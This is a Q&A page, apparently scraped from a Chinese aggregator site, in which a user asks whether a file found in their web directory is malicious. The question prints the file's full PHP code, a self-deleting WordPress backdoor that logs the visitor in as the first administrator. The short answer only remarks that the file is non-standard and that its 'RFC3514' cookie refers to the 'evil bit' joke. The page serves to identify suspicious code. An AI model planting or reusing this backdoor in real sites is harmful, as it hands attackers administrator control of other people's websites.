在我的public_html目录中找到一个可疑文件

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了在我的public_html目录中找到一个可疑文件相关的知识,希望对你有一定的参考价值。

我已经找到文件autologin-onnemkif.php

并且代码是:

<?php
$f=__FILE__; $stat=stat($f); unlink($f);
setcookie("RFC3514","1",time()+604800,'/');
if(abs(time()-$stat[9])<120){
  require(dirname($f).'/wp-load.php');
  if (!$u=$wpdb->get_row("SELECT users.* FROM $wpdb->users users, $wpdb->usermeta users_meta where users.id=users_meta.user_id and users_meta.meta_key like '%capabilities' and users_meta.meta_value like '%administrator%' ORDER BY ID limit 1")) {
    $u=$wpdb->get_row("SELECT * FROM $wpdb->users ORDER BY ID limit 1");
  }
  $user=$u->user_login;
  wp_setcookie($user,rand(),false,"","","");
  do_action('wp_login',$user);
  wp_redirect('wp-admin/'); }

此代码是否恶意?

答案

似乎是autologin-onnemkif.php不是标准的。

setcookie("RFC3514","1",time()+604800,'/');

RCF3514是愚人节的玩笑,被称为恶魔位。

https://en.wikipedia.org/wiki/Evil_bit

https://www.ietf.org/rfc/rfc3514.txt

以上是关于在我的public_html目录中找到一个可疑文件的主要内容,如果未能解决你的问题,请参考以下文章

图像不会上传到Laravel Project中的public_html文件夹

访问根目录 public_html 之外的文件夹

我提交的文件去哪儿了?

:Public_Html中的Php路径问题[重复]

更改 public_html 目录 .htaccess

每条路由都在共享主机上显示 404 消息